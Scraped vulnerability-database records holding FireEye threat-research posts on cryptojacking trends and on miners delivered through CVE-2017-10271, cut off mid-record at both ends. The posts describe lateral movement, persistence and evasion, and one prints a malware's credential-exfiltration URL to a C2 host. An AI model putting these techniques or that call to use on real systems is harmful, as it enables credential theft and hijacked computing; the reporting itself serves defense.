spam and self-propagating utilities. Threat actors can use cryptojacking to affect numerous devices and secretly siphon their computing power. Some of the most commonly observed devices targeted by these cryptojacking schemes are:\n\n * User endpoint machines\n * Enterprise servers\n * Websites\n * Mobile devices\n * Industrial control systems\n\n##### Cryptojacking in the Cloud\n\nPrivate sector companies and governments alike are increasingly [moving their data and applications to the cloud](<https://www.fireeye.com/blog/executive-perspective/2018/04/anatomy-of-a-public-cloud-compromise.html>), and cyber threat groups have been moving with them. Recently, there have been various reports of actors conducting cryptocurrency mining operations specifically targeting cloud infrastructure. Cloud infrastructure is increasingly a target for cryptojacking operations because it offers actors an attack surface with large amounts of processing power in an environment where CPU usage and electricity costs are already expected to be high, thus allowing their operations to potentially go unnoticed. We assess with high confidence that threat actors will continue to target enterprise cloud networks in efforts to harness their collective computational resources for the foreseeable future.\n\nThe following are some real-world examples of cryptojacking in the cloud:\n\n * In February 2018, FireEye researchers published a blog detailing various techniques actors used in order to deliver malicious miner payloads (specifically to vulnerable Oracle servers) by abusing CVE-2017-10271. Refer to our blog post for more detailed information regarding the [post-exploitation and pre-mining dissemination techniques](<https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html>) used in those campaigns.\n * In March 2018, [Bleeping Computer reported](<https://www.bleepingcomputer.com/news/security/coinminer-campaigns-move-to-the-cloud-via-docker-kubernetes/>) on the trend of cryptocurrency mining campaigns moving to the cloud via vulnerable Docker and Kubernetes applications, which are two software tools used by developers to help scale a company's cloud infrastructure. In most cases, successful attacks occur due to misconfigured applications and/or weak security controls and passwords.\n * In February 2018, [Bleeping Computer also reported](<https://www.bleepingcomputer.com/news/security/tesla-internal-servers-infected-with-cryptocurrency-miner/>) on hackers who breached Tesla's cloud servers to mine Monero. Attackers identified a Kubernetes console that was not password protected, allowing them to discover login credentials for the broader Tesla Amazon Web services (AWS) S3 cloud environment. Once the attackers gained access to the AWS environment via the harvested credentials, they effectively launched their cryptojacking operations.\n * Reports of cryptojacking activity due to misconfigured AWS S3 cloud storage buckets have also been observed, as was the case in the [LA Times online compromise](<https://www.theregister.co.uk/2018/02/22/la_times_amazon_aws_s3/>) in February 2018. The presence of vulnerable AWS S3 buckets allows anyone on the internet to access and change hosted content, including the ability to inject mining scripts or other malicious software.\n\n##### Incorporation of Cryptojacking into Existing Botnets\n\nFireEye iSIGHT Intelligence has observed multiple prominent botnets such as Dridex and Trickbot incorporate cryptocurrency mining into their existing operations. Many of these families are modular in nature and have the ability to download and execute remote files, thus allowing the operators to easily turn their infections into cryptojacking bots. While these operations have traditionally been aimed at credential theft (particularly of banking credentials), adding mining modules or downloading secondary mining payloads provides the operators another avenue to generate additional revenue with little effort. This is especially true in cases where the victims were deemed unprofitable or have already been exploited in the original scheme.\n\nThe following are some real-world examples of cryptojacking being incorporated into existing botnets:\n\n * In early February 2018, FireEye iSIGHT Intelligence observed Dridex botnet ID 2040 download a Monero cryptocurrency miner based on the open-source XMRig miner.\n * On Feb. 12, 2018, FireEye iSIGHT Intelligence observed the banking malware IcedID injecting Monero-mining JavaScript into webpages for specific, targeted URLs. The IcedID injects launched an anonymous miner using the mining code from Coinhive's [AuthedMine](<https://authedmine.com/lib/authedmine.min.js>).\n * In late 2017, [Bleeping Computer reported](<https://www.bleepingcomputer.com/news/security/codefork-group-uses-fileless-malware-to-deploy-monero-miners/>) that security researchers with Radware observed the hacking group CodeFork leveraging the popular downloader Andromeda (aka Gamarue) to distribute a miner module to their existing botnets.\n * In late 2017, FireEye researchers observed Trickbot operators deploy a new module named \"testWormDLL\" that is a statically compiled copy of the popular XMRig Monero miner.\n * On Aug. 29, 2017, [Security Week reported](<https://www.securityweek.com/jimmy-banking-trojan-reuses-nukebot-code>) on a variant of the popular Neutrino banking Trojan, including a Monero miner module. According to their reporting, the new variant no longer aims at stealing bank card data, but instead is limited to downloading and executing modules from a remote server.\n\n#### Drive-By Cryptojacking\n\n##### In-Browser\n\nFireEye iSIGHT Intelligence has examined various customer reports of browser-based cryptocurrency mining. Browser-based mining scripts have been observed on compromised websites, third-party advertising platforms, and have been legitimately placed on websites by publishers. While coin mining scripts can be embedded directly into a webpage's source code, they are frequently loaded from third-party websites. Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers, such as in the case of a compromised website. Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors. At the time of reporting, the most popular script being deployed in the wild is Coinhive. Coinhive is an open-source JavaScript library that, when loaded on a vulnerable website, can mine Monero using the site visitor's CPU resources, unbeknownst to the user, as they browse the site.\n\nThe following are some real-world examples of Coinhive being deployed in the wild:\n\n * In September 2017, [Bleeping Computer reported](<https://www.bleepingcomputer.com/news/security/chrome-extension-embeds-in-browser-monero-miner-that-drains-your-cpu/>) that the authors of SafeBrowse, a Chrome extension with more than 140,000 users, had embedded the Coinhive script in the extension's code that allowed for the mining of Monero using users' computers and without getting their consent.\n * During mid-September 2017, [users on Reddit](<https://www.reddit.com/r/thepiratebay/comments/70aip7/100_cpu_on_all_8_threads_while_visiting_tpb/?sort=new>) began complaining about increased CPU usage when they navigated to a popular torrent site, The Pirate Bay (TPB). The spike in CPU usage was a result of Coinhive's script being embedded within the site's footer. According to TPB operators, it was implemented as a test to generate passive revenue for the site (Figure 8).\n * In December 2017, researchers with [Sucuri reported](<https://blog.sucuri.net/2017/12/malicious-cryptominers-from-github.html>) on the presence of the Coinhive script being hosted on GitHub.io, which allows users to publish web pages directly from GitHub repositories.\n * Other reporting disclosed the Coinhive script being embedded on the [Showtime domain](<https://www.bleepingcomputer.com/news/security/showtime-websites-used-to-mine-monero-unclear-if-hack-or-an-experiment/>) as well as on the [LA Times website](<https://www.itwire.com/security/81860-la-times-serving-cryptocurrency-mining-script.html>), both surreptitiously mining Monero.\n * A majority of in-browser cryptojacking activity is transitory in nature and will last only as long as the user\u2019s web browser is open. However, [researchers with Malwarebytes Labs](<https://blog.malwarebytes.com/cybercrime/2017/11/persistent-drive-by-cryptomining-coming-to-a-browser-near-you/>) uncovered a technique that allows for continued mining activity even after the browser window is closed. The technique leverages a pop-under window surreptitiously hidden under the taskbar. As researchers pointed out, closing the browser window may not be enough to interrupt the activity, and that more advanced actions like running the Task Manager may be required.\n\n \nFigure 8: Statement from TPB operators on Coinhive script\n\n##### Malvertising and Exploit Kits\n\nMalvertisements \u2013 malicious ads on legitimate websites \u2013 commonly redirect visitors of a site to an exploit kit landing page. These landing pages are designed to scan a system for vulnerabilities, exploit those vulnerabilities, and download and execute malicious code onto the system. Notably, the malicious advertisements can be placed on legitimate sites and visitors can become infected with little to no user interaction. This distribution tactic is commonly used by threat actors to widely distribute malware and has been employed in various cryptocurrency mining operations.\n\nThe following are some real-world examples of this activity:\n\n * In early 2018, [researchers with Trend Micro reported](<https://www.bleepingcomputer.com/news/security/coinhive-cryptojacker-deployed-on-youtube-via-google-ads/>) that a modified miner script was being disseminated across YouTube via Google's DoubleClick ad delivery platform. The script was configured to generate a random number variable between 1 and 100, and when the variable was above 10 it would launch the Coinhive script _coinhive.min.js_, which harnessed 80 percent of the CPU power to mine Monero. When the variable was below 10 it launched a modified Coinhive script that was also configured to harness 80 percent CPU power to mine Monero. This custom miner connected to the mining pool wss[:]//ws[.]l33tsite[.]info:8443, which was likely done to avoid Coinhive's fees.\n * In April 2018, researchers with [Trend Micro](<https://blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-web-miner-script-injected-into-aol-advertising-platform/>) also discovered a JavaScript code based on Coinhive injected into an AOL ad platform. The miner used the following private mining pools: wss[:]//wsX[.]www.datasecu[.]download/proxy and wss[:]//www[.]jqcdn[.]download:8893/proxy. Examination of other sites compromised by this campaign showed that in at least some cases the operators were hosting malicious content on unsecured AWS S3 buckets.\n * Since July 16, 2017, [FireEye has observed](<https://www.fireeye.com/blog/threat-research/2017/08/neptune-exploit-kit-malvertising.html>) the Neptune Exploit Kit redirect to ads for hiking clubs and MP3 converter domains. Payloads associated with the latter include Monero CPU miners that are surreptitiously installed on victims' computers.\n * In January 2018, [Check Point researchers](<https://research.checkpoint.com/new-rig-exploit-kit-campaign-dropping-xmrig-miner/>) discovered a malvertising campaign leading to the Rig Exploit Kit, which served the XMRig Monero miner utility to unsuspecting victims.\n\n#### Mobile Cryptojacking\n\nIn addition to targeting enterprise servers and user machines, threat actors have also targeted mobile devices for cryptojacking operations. While this technique is less common, likely due to the limited processing power afforded by mobile devices, cryptojacking on mobile devices remains a threat as sustained power consumption can damage the device and dramatically shorten the battery life. Threat actors have been observed targeting mobile devices by hosting malicious cryptojacking apps on popular app stores and through drive-by malvertising campaigns that identify users of mobile browsers.\n\nThe following are some real-world examples of mobile devices being used for cryptojacking:\n\n * During 2014, FireEye iSIGHT Intelligence reported on multiple Android malware apps capable of mining cryptocurrency:\n * In March 2014, Android malware named \"CoinKrypt\" was discovered, which mined Litecoin, Dogecoin, and CasinoCoin currencies.\n * In March 2014, another form of Android malware \u2013 \"Android.Trojan.MuchSad.A\" or \"ANDROIDOS_KAGECOIN.HBT\" \u2013 was observed mining Bitcoin, Litecoin, and Dogecoin currencies. The malware was disguised as copies of popular applications, including \"Football Manager Handheld\" and \"TuneIn Radio.\" Variants of this malware have reportedly been downloaded by millions of Google Play users.\n * In April 2014, Android malware named \"BadLepricon,\" which mined Bitcoin, was identified. The malware was reportedly being bundled into wallpaper applications hosted on the Google Play store, at least several of which received 100 to 500 installations before being removed.\n * In October 2014, a type of mobile malware called \"Android Slave\" was observed in China; the malware was reportedly capable of mining multiple virtual currencies.\n * In December 2017, [researchers with Kaspersky Labs reported](<https://securelist.com/jack-of-all-trades/83470/>) on a new multi-faceted Android malware capable of a variety of actions including mining cryptocurrencies and launching DDoS attacks. The resource load created by the malware has reportedly been high enough that it can cause the battery to bulge and physically destroy the device. The malware, dubbed Loapi, is unique in the breadth of its potential actions. It has a modular framework that includes modules for malicious advertising, texting, web crawling, Monero mining, and other activities. Loapi is thought to be the work of the same developers behind the 2015 Android malware Podec, and is usually disguised as an anti-virus app.\n * In January 2018, [SophosLabs released a report](<https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-coinminer-and-other-malicious-cryptominers-tpna.pdf?la=en>) detailing their discovery of 19 mobile apps hosted on Google Play that contained embedded Coinhive-based cryptojacking code, some of which were downloaded anywhere from 100,000 to 500,000 times.\n * Between November 2017 and January 2018, [researchers with Malwarebytes Labs reported](<https://blog.malwarebytes.com/threat-analysis/2018/02/drive-by-cryptomining-campaign-attracts-millions-of-android-users/>) on a drive-by cryptojacking campaign that affected millions of Android mobile browsers to mine Monero.\n\n#### Cryptojacking Spam Campaigns\n\nFireEye iSIGHT Intelligence has observed several cryptocurrency miners distributed via spam campaigns, which is a commonly used tactic to indiscriminately distribute malware. We expect malicious actors will continue to use this method to disseminate cryptojacking code as for long as cryptocurrency mining remains profitable.\n\nIn late November 2017, FireEye researchers identified a spam campaign delivering a malicious PDF attachment designed to appear as a legitimate invoice from the largest port and container service in New Zealand: Lyttelton Port of Chistchurch (Figure 9). Once opened, the PDF would launch a PowerShell script that downloaded a Monero miner from a remote host. The malicious miner connected to the pools supportxmr.com and nanopool.org.\n\n \nFigure 9: Sample lure attachment (PDF) that downloads malicious cryptocurrency miner\n\nAdditionally, a massive cryptojacking spam campaign was discovered by FireEye researchers during January 2018 that was designed to look like legitimate financial services-related emails. The spam email directed victims to an infection link that ultimately dropped a malicious ZIP file onto the victim's machine. Contained within the ZIP file was a cryptocurrency miner utility (MD5: 80b8a2d705d5b21718a6e6efe531d493) configured to mine Monero and connect to the minergate.com pool. While each of the spam email lures and associated ZIP filenames were different, the same cryptocurrency miner sample was dropped across all observed instances (Table 2).\n\n**ZIP Filenames** \n \n--- \n \ncalifornia_540_tax_form_2013_instructions.exe\n\nstate_bank_of_india_money_transfer_agency.exe\n\nformat_transfer_sms_banking_bni_ke_bca.exe\n\nconfirmation_receipt_letter_sample.exe\n\nsbi_online_apply_2015_po.exe\n\nestimated_tax_payment_coupon_irs.exe\n\nhow_to_add_a_non_us_bank_account_to_paypal.exe\n\nwestern_union_money_transfer_from_uk_to_bangladesh.exe\n\ncan_i_transfer_money_from_bank_of_ireland_to_aib_online.exe\n\nhow_to_open_a_business_bank_account_with_bad_credit_history.exe\n\napply_for_sbi_credit_card_online.exe\n\nlist_of_lucky_winners_in_dda_housing_scheme_2014.exe \n \nTable 2: Sampling of observed ZIP filenames delivering cryptocurrency miner\n\n#### Cryptojacking Worms\n\nFollowing the WannaCry attacks, actors began to increasingly incorporate self-propagating functionality within their malware. Some of the observed self-spreading techniques have included copying to removable drives, brute forcing SSH logins, and leveraging the leaked NSA exploit [EternalBlue](<https://www.fireeye.com/blog/threat-research/2017/05/smb-exploited-wannacry-use-of-eternalblue.html>). Cryptocurrency mining operations significantly benefit from this functionality since wider distribution of the malware multiplies the amount of CPU resources available to them for mining. Consequently, we expect that additional actors will continue to develop this capability.\n\nThe following are some real-world examples of cryptojacking worms:\n\n * In May 2017, [Proofpoint reported](<https://www.proofpoint.com/us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar>) a large campaign distributing mining malware \"Adylkuzz.\" This cryptocurrency miner was observed leveraging the EternalBlue exploit to rapidly spread itself over corporate LANs and wireless networks. This activity included the use of the DoublePulsar backdoor to download Adylkuzz. Adylkuzz infections create botnets of Windows computers that focus on mining Monero.\n * Security researchers with [Sensors identified](<https://sensorstechforum.com/w32-rarogminer-monero-miner-worm-lsass-exe-remove/>) a Monero miner worm, dubbed \"Rarogminer,\" in April 2018 that would copy itself to removable drives each time a user inserted a flash drive or external HDD.\n * In January 2018, [researchers at F5](<https://f5.com/labs/articles/threat-intelligence/malware/new-python-based-crypto-miner-botnet-flying-under-the-radar>) discovered a new Monero cryptomining botnet that targets Linux machines. PyCryptoMiner is based on Python script and spreads via the SSH protocol. The bot can also use Pastebin for its command and control (C2) infrastructure. The malware spreads by trying to guess the SSH login credentials of target Linux systems. Once that is achieved, the bot deploys a simple base64-encoded Python script that connects to the C2 server to download and execute more malicious Python code.\n\n#### Detection Avoidance Methods\n\nAnother trend worth noting is the use of proxies to avoid detection. The implementation of mining proxies presents an attractive option for cyber criminals because it allows them to avoid developer and commission fees of 30 percent or more. Avoiding the use of common cryptojacking services such as Coinhive, Cryptloot, and Deepminer, and instead hosting cryptojacking scripts on actor-controlled infrastructure, can circumvent many of the common strategies taken to block this activity via domain or file name blacklisting.\n\nIn March 2018, [Bleeping Computer reported](<https://www.bleepingcomputer.com/news/security/in-browser-cryptojacking-is-getting-harder-to-detect/>) on the use of cryptojacking proxy servers and determined that as the use of cryptojacking proxy services increases, the effectiveness of ad blockers and browser extensions that rely on blacklists decreases significantly.\n\nSeveral mining proxy tools can be found on GitHub, such as the [XMRig Proxy](<https://github.com/xmrig/xmrig-proxy>) tool, which greatly reduces the number of active pool connections, and the [CoinHive Stratum Mining Proxy](<https://github.com/x25/coinhive-stratum-mining-proxy>), which uses Coinhive\u2019s JavaScript mining library to provide an alternative to using official Coinhive scripts and infrastructure.\n\nIn addition to using proxies, actors may also establish their own self-hosted miner apps, either on private servers or cloud-based servers that supports Node.js. Although private servers may provide some benefit over using a commercial mining service, they are still subject to easy blacklisting and require more operational effort to maintain. According to [Sucuri researchers](<https://blog.sucuri.net/2018/01/malicious-cryptominers-from-github-part-2.html>), cloud-based servers provide many benefits to actors looking to host their own mining applications, including:\n\n * Available free or at low-cost\n * No maintenance, just upload the crypto-miner app\n * Harder to block as blacklisting the host address could potentially impact access to legitimate services\n * Resilient to permanent takedown as new hosting accounts can more easily be created using disposable accounts\n\nThe combination of proxies and crypto-miners hosted on actor-controlled cloud infrastructure presents a significant hurdle to security professionals, as both make cryptojacking operations more difficult to detect and take down.\n\n#### Mining Victim Demographics\n\nBased on data from FireEye detection technologies, the detection of cryptocurrency miner malware has increased significantly since the beginning of 2018 (Figure 10), with the most popular mining pools being minergate and nanopool (Figure 11), and the most heavily affected country being the U.S. (Figure 12). Consistent with [other reporting](<https://www.bleepingcomputer.com/news/cryptocurrency/students-mining-cryptocurrencies-are-clogging-up-university-networks/>), the education sector remains most affected, likely due to more relaxed security controls across university networks and students taking advantage of free electricity to mine cryptocurrencies (Figure 13).\n\n \nFigure 10: Cryptocurrency miner detection activity per month\n\n \nFigure 11: Commonly observed pools and associated ports\n\n \nFigure 12: Top 10 affected countries\n\n \nFigure 13: Top five affected industries\n\n \nFigure 14: Top affected industries by country\n\n#### Mitigation Techniques\n\n##### Unencrypted Stratum Sessions\n\nAccording to security researchers at Cato Networks, in order for a miner to participate in pool mining, the infected machine will have to run native or JavaScript-based code that uses the Stratum protocol over TCP or HTTP/S. The Stratum protocol uses a publish/subscribe architecture where clients will send subscription requests to join a pool and servers will send messages (publish) to its subscribed clients. These messages are simple, readable, JSON-RPC messages. Subscription requests will include the following entities: id, method, and params (Figure 15). A deep packet inspection (DPI) engine can be configured to look for these parameters in order to block Stratum over unencrypted TCP.\n\n \nFigure 15: Stratum subscription request parameters\n\n##### Encrypted Stratum Sessions\n\nIn the case of JavaScript-based miners running Stratum over HTTPS, detection is more difficult for DPI engines that do not decrypt TLS traffic. To mitigate encrypted mining traffic on a network, organizations may blacklist the IP addresses and domains of popular mining pools. However, the downside to this is identifying and updating the blacklist, as locating a reliable and continually updated list of popular mining pools can prove difficult and time consuming.\n\n##### Browser-Based Sessions\n\nIdentifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers (as in the case of a compromised website). Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors.\n\nAs defenses evolve to prevent unauthorized coin mining activities, so will the techniques used by actors; however, blocking some of the most common indicators that we have observed to date may be effective in combatting a significant amount of the CPU-draining mining activities that customers have reported. Generic detection strategies for browser-based cryptocurrency mining include:\n\n * Blocking domains known to have hosted coin mining scripts\n * Blocking websites of known mining project websites, such as Coinhive\n * Blocking scripts altogether\n * Using an ad-blocker or coin mining-specific browser add-ons\n * Detecting commonly used naming conventions\n * Alerting and blocking traffic destined for known popular mining pools\n\nSome of these detection strategies may also be of use in blocking some mining functionality included in existing financial malware as well as mining-specific malware families.\n\nIt is important to note that JavaScript used in browser-based cryptojacking activity cannot access files on disk. However, if a host has inadvertently navigated to a website hosting mining scripts, we recommend purging cache and other browser data.\n\n#### Outlook\n\nIn underground communities and marketplaces there has been significant interest in cryptojacking operations, and numerous campaigns have been observed and reported by security researchers. These developments demonstrate the continued upward trend of threat actors conducting cryptocurrency mining operations, which we expect to see a continued focus on throughout 2018. Notably, malicious cryptocurrency mining may be seen as preferable due to the perception that it does not attract as much attention from law enforcement as compared to other forms of fraud or theft. Further, victims may not realize their computer is infected beyond a slowdown in system performance.\n\nDue to its inherent privacy-focused features and CPU-mining profitability, Monero has become one of the most attractive cryptocurrency options for cyber criminals. We believe that it will continue to be threat actors' primary cryptocurrency of choice, so long as the Monero blockchain maintains privacy-focused standards and is ASIC-resistant. If in the future the Monero protocol ever downgrades its security and privacy-focused features, then we assess with high confidence that threat actors will move to use another privacy-focused coin as an alternative.\n\nBecause of the anonymity associated with the Monero cryptocurrency and electronic wallets, as well as the availability of numerous cryptocurrency exchanges and tumblers, attribution of malicious cryptocurrency mining is very challenging for authorities, and malicious actors behind such operations typically remain unidentified. Threat actors will undoubtedly continue to demonstrate high interest in malicious cryptomining so long as it remains profitable and relatively low risk.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-18T10:00:00", "type": "fireeye", "title": "How the Rise of Cryptocurrencies Is Shaping the Cyber Crime Landscape: The Growth of Miners", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0099", "CVE-2017-10271"], "modified": "2018-07-18T10:00:00", "id": "FIREEYE:2473273CA0F291BCEBB5F99AA3E4F256", "href": "https://www.fireeye.com/blog/threat-research/2018/07/cryptocurrencies-cyber-crime-growth-of-miners.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-11-04T00:24:47", "description": "#### Introduction\n\nFireEye researchers recently observed threat actors abusing CVE-2017-10271 to deliver various cryptocurrency miners.\n\nCVE-2017-10271 is a known input validation vulnerability that exists in the WebLogic Server Security Service (WLS Security) in Oracle WebLogic Server versions 12.2.1.2.0 and prior, and attackers can exploit it to remotely execute arbitrary code. Oracle released a [Critical Patch Update](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>) that reportedly fixes this vulnerability. Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors.\n\nFireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017. Attackers then leveraged this vulnerability to download cryptocurrency miners in victim environments.\n\nWe saw evidence of organizations located in various countries \u2013 including the United States, Australia, Hong Kong, United Kingdom, India, Malaysia, and Spain, as well as those from nearly every industry vertical \u2013 being impacted by this activity. Actors involved in cryptocurrency mining operations mainly exploit opportunistic targets rather than specific organizations. This coupled with the diversity of organizations potentially affected by this activity suggests that the external targeting calculus of these attacks is indiscriminate in nature.\n\nThe recent cryptocurrency boom has resulted in a growing number of operations \u2013 employing diverse tactics \u2013 aimed at stealing cryptocurrencies. The idea that these cryptocurrency mining operations are less risky, along with the potentially nice profits, could lead cyber criminals to begin shifting away from ransomware campaigns.\n\n#### Tactic #1: Delivering the miner directly to a vulnerable server\n\nSome tactics we've observed involve exploiting CVE-2017-10271, leveraging PowerShell to download the miner directly onto the victim\u2019s system (Figure 1), and executing it using ShellExecute().\n\n \nFigure 1: Downloading the payload directly\n\n#### Tactic #2: Utilizing PowerShell scripts to deliver the miner\n\nOther tactics involve the exploit delivering a PowerShell script, instead of downloading the executable directly (Figure 2).\n\n \nFigure 2: Exploit delivering PowerShell script\n\nThis script has the following functionalities:\n\n * **Downloading miners from remote servers**\n\n \nFigure 3: Downloading cryptominers\n\nAs shown in Figure 3, the .ps1 script tries to download the payload from the remote server to a vulnerable server.\n\n * **Creating scheduled tasks for persistence**\n\n \nFigure 4: Creation of scheduled task\n\n * **Deleting scheduled tasks of other known cryptominers**\n\n \nFigure 5: Deletion of scheduled tasks related to other miners\n\nIn Figure 4, the cryptominer creates a scheduled task with name \u201c_Update service for Oracle products1_\u201d. In Figure 5, a different variant deletes this task and other similar tasks after creating its own, \u201c_Update service for Oracle productsa_\u201d. \n\nFrom this, it\u2019s quite clear that different attackers are fighting over the resources available in the system.\n\n * **Killing processes matching certain strings associated with other cryptominers**\n\n \nFigure 6: Terminating processes directly\n\n \nFigure 7: Terminating processes matching certain strings\n\nSimilar to scheduled tasks deletion, certain known mining processes are also terminated (Figure 6 and Figure 7).\n\n * **Connects to mining pools with wallet key**\n\n \nFigure 8: Connection to mining pools\n\nThe miner is then executed with different flags to connect to mining pools (Figure 8). Some of the other observed flags are: -a for algorithm, -k for keepalive to prevent timeout, -o for URL of mining server, -u for wallet key, -p for password of mining server, and -t for limiting the number of miner threads.\n\n * **Limiting CPU usage to avoid suspicion**\n\n \nFigure 9: Limiting CPU Usage\n\nTo avoid suspicion, some attackers are limiting the CPU usage of the miner (Figure 9).\n\n#### Tactic #3: Lateral movement across Windows environments using Mimikatz and EternalBlue\n\nSome tactics involve spreading laterally across a victim\u2019s environment using dumped Windows credentials and the [EternalBlue](<https://www.fireeye.com/blog/threat-research/2017/05/smb-exploited-wannacry-use-of-eternalblue.html>) vulnerability ([CVE-2017-0144](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>)).\n\nThe malware checks whether its running on a 32-bit or 64-bit system to determine which PowerShell script to grab from the command and control (C2) server. It looks at every network adapter, aggregating all destination IPs of established non-loopback network connections. Every IP address is then tested with extracted credentials and a credential-based execution of PowerShell is attempted that downloads and executes the malware from the C2 server on the target machine. This variant maintains persistence via WMI (Windows Management Instrumentation).\n\nThe malware also has the capability to perform a [Pass-the-Hash](<https://en.wikipedia.org/wiki/Pass_the_hash>) attack with the NTLM information derived from Mimikatz in order to download and execute the malware in remote systems.\n\nAdditionally, the malware exfiltrates stolen credentials to the attacker via an HTTP GET request to: 'http://&lt;C2&gt;:8000/api.php?data=&lt;credential data&gt;'.\n\nIf the lateral movement with credentials fails, then the malware uses PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine if its vulnerable to EternalBlue, and uses it to spread to that host.\n\nAfter all network derived IPs have been processed, the malware generates random IPs and uses the same combination of PingCastle and EternalBlue to spread to that host.\n\n#### Tactic #4: Scenarios observed in Linux OS\n\nWe\u2019ve also observed this vulnerability being exploited to deliver shell scripts (Figure 10) that have functionality similar to the PowerShell scripts.\n\n \nFigure 10: Delivery of shell scripts\n\nThe shell script performs the following activities:\n\n * **Attempts to kill already running cryptominers**\n\n \nFigure 11: Terminating processes matching certain strings\n\n * **Downloads and executes cryptominer malware**\n\n \nFigure 12: Downloading CryptoMiner\n\n * **Creates a cron job to maintain persistence**\n\n \nFigure 13: Cron job for persistence\n\n * **Tries to kill other potential miners to hog the CPU usage**\n\n \nFigure 14: Terminating other potential miners\n\nThe function shown in Figure 14 is used to find processes that have high CPU usage and terminate them. This terminates other potential miners and maximizes the utilization of resources.\n\n#### Conclusion\n\nUse of cryptocurrency mining malware is a popular tactic leveraged by financially-motivated cyber criminals to make money from victims. We\u2019ve observed one threat actor mining around 1 XMR/day, demonstrating the potential profitability and reason behind the recent rise in such attacks. Additionally, these operations may be perceived as less risky when compared to ransomware operations, since victims may not even know the activity is occurring beyond the slowdown in system performance.\n\nNotably, cryptocurrency mining malware is being distributed using various tactics, typically in an opportunistic and indiscriminate manner so cyber criminals will maximize their outreach and profits.\n\nFireEye HX, being a behavior-based solution, is not affected by cryptominer tricks. FireEye HX detects these threats at the initial level of the attack cycle, when the attackers attempt to deliver the first stage payload or when the miner tries to connect to mining pools.\n\nAt the time of writing, FireEye HX detects this activity with the following indicators:\n\n**Detection Name** \n \n--- \n \nPOWERSHELL DOWNLOADER (METHODOLOGY) \n \nMONERO MINER (METHODOLOGY) \n \nMIMIKATZ (CREDENTIAL STEALER) \n \n#### Indicators of Compromise\n\n**MD5**\n\n| \n\n**Name** \n \n---|--- \n \n3421A769308D39D4E9C7E8CAECAF7FC4\n\n| \n\ncranberry.exe/logic.exe \n \nB3A831BFA590274902C77B6C7D4C31AE\n\n| \n\nxmrig.exe/yam.exe \n \n26404FEDE71F3F713175A3A3CEBC619B\n\n| \n\n1.ps1 \n \nD3D10FAA69A10AC754E3B7DDE9178C22\n\n| \n\n2.ps1 \n \n9C91B5CF6ECED54ABB82D1050C5893F2\n\n| \n\ninfo3.ps1 \n \n3AAD3FABF29F9DF65DCBD0F308FF0FA8\n\n| \n\ninfo6.ps1 \n \n933633F2ACFC5909C83F5C73B6FC97CC\n\n| \n\nlower.css \n \nB47DAF937897043745DF81F32B9D7565\n\n| \n\nlib.css \n \n3542AC729035C0F3DB186DDF2178B6A0\n\n| \n\nbootstrap.css \n \nThanks to Dileep Kumar Jallepalli and Charles Carmakal for their help in the analysis.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-02-15T16:30:00", "type": "fireeye", "title": "CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques\nUsed Post-Exploitation and Pre-Mining", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-10271"], "modified": "2018-02-15T16:30:00", "id": "FIREEYE:57B0F10A16E18DC672833B1812005B76", "href": "https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-08-31T00:18:23", "description": "#### Introduction\n\nFireEye researchers recently observed threat actors abusing CVE-2017-10271 to deliver various cryptocurrency miners.\n\nCVE-2017-10271 is a known input validation vulnerability that exists in the 